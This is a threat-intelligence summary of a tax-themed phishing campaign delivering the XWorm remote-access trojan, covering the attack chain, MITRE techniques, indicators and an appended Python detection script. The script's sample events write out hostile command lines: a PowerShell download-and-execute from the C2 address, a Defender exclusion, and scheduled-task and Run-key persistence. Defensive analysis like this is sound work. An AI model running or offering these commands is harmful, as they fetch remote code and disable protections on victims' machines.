Don’t Take the Bait: The XWorm Tax Scam

eSentire’s TRU investigated a tax-themed phishing campaign that delivered XWorm v5.2 as the final payload after a malicious JavaScript attachment executed and fetched a PowerShell script from a remote host. The attack chain included process termination, Defender exclusion modifications, disabling of security controls, persistence via scheduled tasks and Registry Run Keys, and C2 communication to 91.92.243[.]28. #XWorm #eSentire

Keypoints

  • Initial access achieved via a phishing email with a malicious JavaScript attachment named “Tax-docs-2023.pdf .js” downloaded from a compromised site.
  • The JS executed under wscript.exe and retrieved a PowerShell script (atom.xml) from 91.92.243[.]28 that performed the main malicious actions.
  • The PowerShell script terminated specific processes, dropped a decoy PDF, injected the XWorm RAT into legitimate processes (Msbuild.exe and RegSvcs.exe), and added Defender exclusions to evade detection.
  • Attackers disabled security features including UAC and Windows Firewall and modified Defender settings to reduce detection likelihood.
  • Persistence was established via Scheduled Tasks and Registry Run Keys (tasks renamed to “intuiteupdater”/“Drakeupdater” and registry run entries), with secondary downloads from pdfdatamanage.serveftp[.]com and MediaFire-hosted decoy files.
  • The final payload was XWorm v5.2 (MD5: fc422800144383ef6e2e0eee37e7d6ba) configured to use C2 91.92.243[.]28:4444 with a listed AES key and an install file named USB.exe.
  • eSentire’s SOC isolated the affected device and provided remediation and detection resources (YARA rule and IOCs).

MITRE Techniques

  • [T1566] Phishing – Initial access through a malicious email attachment: ‘the initial infection vector is via the phishing email, as suggested by the infection chain.’
  • [T1059] Command and Scripting Interpreter – Execution of a JavaScript via Windows Script Host and subsequent PowerShell script retrieval: ‘The JS file executes under Windows script host (wscript.exe) which retrieves and executes the atom.xml file.’
  • [T1105] Ingress Tool Transfer – Downloading secondary payloads and decoys from external hosts (MediaFire and remote IP): ‘The decoy PDF … is retrieved from MediaFire’ and atom.xml was retrieved from 91.92.243[.]28/poom/atom.xml.
  • [T1055] Process Injection – Injecting the final XWorm payload into legitimate processes: ‘Injecting the final payload into Msbuild.exe and RegSvcs.exe processes.’
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Modifying Windows Defender exclusions and disabling security features to evade detection: ‘Adding a list of file extensions, paths, and processes to the Windows Defender exclusions list’ and ‘Disabling Windows Defender security features.’
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass UAC – Disabling or bypassing UAC so applications can run elevated without prompts: ‘Disabling UAC, meaning that applications can run with elevated privileges without prompting the user.’
  • [T1053.005] Scheduled Task/Job – Establishing persistence via scheduled tasks (e.g., “intuiteupdater” task execution): ‘Setting up the persistence via Scheduled Tasks.’
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Persistence via Registry Run Keys with entries that trigger mshta and PowerShell downloads: ‘Persistence via Registry Run Keys’ and reference to registry entries launching mshta to download commands from pdfdatamanage.serveftp[.]com.

Indicators of Compromise

  • [File Hash] Malicious files – 5706efd7e0254105261057a82308ed72 (Tax-docs-2023.pdf .js), c1614e86b6808df891c5d7310d089211 (atom.xml), and 2 more hashes including fc422800144383ef6e2e0eee37e7d6ba (XWorm payload).
  • [File Name] Dropped/decoy files – “Tax-docs-2023.pdf .js” (malicious JS), “James_Charles_Tax_2023.pdf” (decoy), USB.exe (install filename for XWorm).
  • [Domain/URL] Malicious hosting and download locations – spnmandalawangi.banten.polri.go[.]id/Tax_docs_2023.htm (compromised site serving the JS), pdfdatamanage.serveftp[.]com/docs.pdf (secondary download, offline at analysis time), MediaFire (decoy PDF host).
  • [IP / C2] Command and Control – 91.92.243[.]28 (host serving atom.xml and listed C2) on port 4444.

eSentire’s TRU analysis shows a compact, multi-stage attack chain beginning with a phishing email that delivers a JavaScript attachment masquerading as a PDF. When executed under Windows Script Host (wscript.exe), the JS fetches a PowerShell script (atom.xml) from 91.92.243[.]28; that PowerShell payload terminates selected processes, drops and opens a decoy PDF (retrieved from MediaFire), and injects the XWorm RAT into legitimate processes (Msbuild.exe and RegSvcs.exe).

The PowerShell script also modifies Windows Defender exclusions, disables security controls including UAC and Windows Firewall, and establishes persistence through scheduled tasks and Registry Run Keys (tasks initially named “loratask”/“tasklorraalman” renamed to “intuiteupdater”/“Drakeupdater”, with mshta invoked to pull further PowerShell commands from pdfdatamanage.serveftp[.]com). The final implant is XWorm v5.2 (MD5: fc422800144383ef6e2e0eee37e7d6ba) configured to contact C2 91.92.243[.]28:4444 with an embedded AES key and an install filename “USB.exe”.

Detection and mitigation focus should include blocking the identified hosts and hashes; monitoring for script execution via wscript/mshta, PowerShell spawned by a script host, and unexpected Msbuild/RegSvcs activity; auditing Defender exclusion changes and scheduled task/Registry Run Key creations; and enforcing email attachment handling by setting the default “open with” handler for script extensions such as .js to a text editor, so that a double-clicked attachment cannot execute under wscript.exe.
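As an added illustration of the detection points above (this is example code, not from the eSentire post or its YARA rule), the following Python applies heuristic rules tied to this campaign's chain to constructed Sysmon-style process-creation events; the event field names, rule names and sample command lines are assumptions made for the example.

```python
import re

# Constructed sample process-creation events in Sysmon Event ID 1 style (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\u\\Downloads\\Tax-docs-2023.pdf .js"'},
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c IEX(iwr http://91.92.243[.]28/poom/atom.xml)"},
    {"parent": "powershell.exe", "image": "powershell.exe",
     "cmdline": "powershell Add-MpPreference -ExclusionProcess Msbuild.exe"},
    {"parent": "powershell.exe", "image": "schtasks.exe",
     "cmdline": "schtasks /create /tn intuiteupdater /sc minute /tr C:\\Users\\u\\AppData\\x.vbs"},
    {"parent": "powershell.exe", "image": "reg.exe",
     "cmdline": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Drakeupdater /d mshta"},
    {"parent": "powershell.exe", "image": "Msbuild.exe",
     "cmdline": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe"},
    {"parent": "devenv.exe", "image": "Msbuild.exe",   # a developer build: must not fire
     "cmdline": "Msbuild.exe proj.csproj"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
INJECTION_HOSTS = {"msbuild.exe", "regsvcs.exe", "regasm.exe"}
# "Tax-docs-2023.pdf .js": document extension, padding whitespace, then a script extension
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?)\s+\.(?:js|jse|vbs|vbe|wsf)\b", re.IGNORECASE)
RUN_KEY = re.compile(r"CurrentVersion\\Run", re.IGNORECASE)

def detect(event):
    """Return the names of the rules a single process-creation event triggers."""
    parent, image = event["parent"].lower(), event["image"].lower()
    cmd = event["cmdline"]
    hits = []
    if image == "wscript.exe" and DOUBLE_EXT.search(cmd):
        hits.append("double_extension_script")
    if parent in {"wscript.exe", "cscript.exe", "mshta.exe"} and image == "powershell.exe":
        hits.append("script_host_spawns_powershell")
    if "add-mppreference" in cmd.lower() and "-exclusion" in cmd.lower():
        hits.append("defender_exclusion_added")
    if image == "schtasks.exe" and "/create" in cmd.lower():
        hits.append("scheduled_task_created")
    if image == "reg.exe" and RUN_KEY.search(cmd):
        hits.append("run_key_modified")
    if image in INJECTION_HOSTS and parent in SCRIPT_HOSTS:
        hits.append("injection_host_from_script")
    return hits

def scan(events):
    """Map each triggered rule name to the indexes of the events that triggered it."""
    report = {}
    for i, ev in enumerate(events):
        for rule in detect(ev):
            report.setdefault(rule, []).append(i)
    return report
```

Each rule corresponds to one stage of the chain described above; the parent-process condition on the Msbuild/RegSvcs rule is what keeps an ordinary developer build from alerting.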

Read more: https://www.esentire.com/blog/dont-take-the-bait-the-xworm-tax-scam